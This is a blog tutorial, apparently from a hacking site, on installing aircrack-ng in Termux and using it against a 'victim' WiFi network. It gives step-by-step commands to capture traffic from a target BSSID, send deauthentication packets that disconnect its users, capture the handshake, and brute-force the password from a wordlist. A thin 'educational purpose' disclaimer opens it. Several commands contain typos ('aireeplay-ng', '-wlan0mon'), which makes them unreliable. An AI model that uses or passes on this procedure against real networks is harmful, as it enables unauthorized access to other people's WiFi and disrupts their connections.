AIRCRACK-NG: HOW TO INSTALL WIFI HACKING TOOL IN TERMUX ( EASIEST WAY )
Aircrack-ng in just two easy steps.
NOTE: This article is only for an Educational purpose. Any actions or activities related to the material contained on this Website is solely your responsibility. Misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and www.yashhaxinc.blogspot.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Requirements:
• Termux from play store.
• Mobile data / wifi connection.
First step is to update and upgrade the installed packages
1. pkg update
2. pkg upgrade
3. pkg install root-repo
4. pkg install aircrack-ng
Good now you have installed the tool in termux
Follow these Steps To Start Aircrack-ng :-
First connect your wife-adapter to your device :
1) Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2) Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z
ctrl + z
3) Now create one folder and name it cap on your desktop or sdcard
and also create a password list to brute force the wifi handshake ,collect the information about victem and create the password list for brute force.
4) copy victem BSSID and also note the target channel CH number
and type this command :
airodump-ng -c 6 --bssid 00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon
-w here you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
5) Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
6) now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
7) this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
Comments
Post a Comment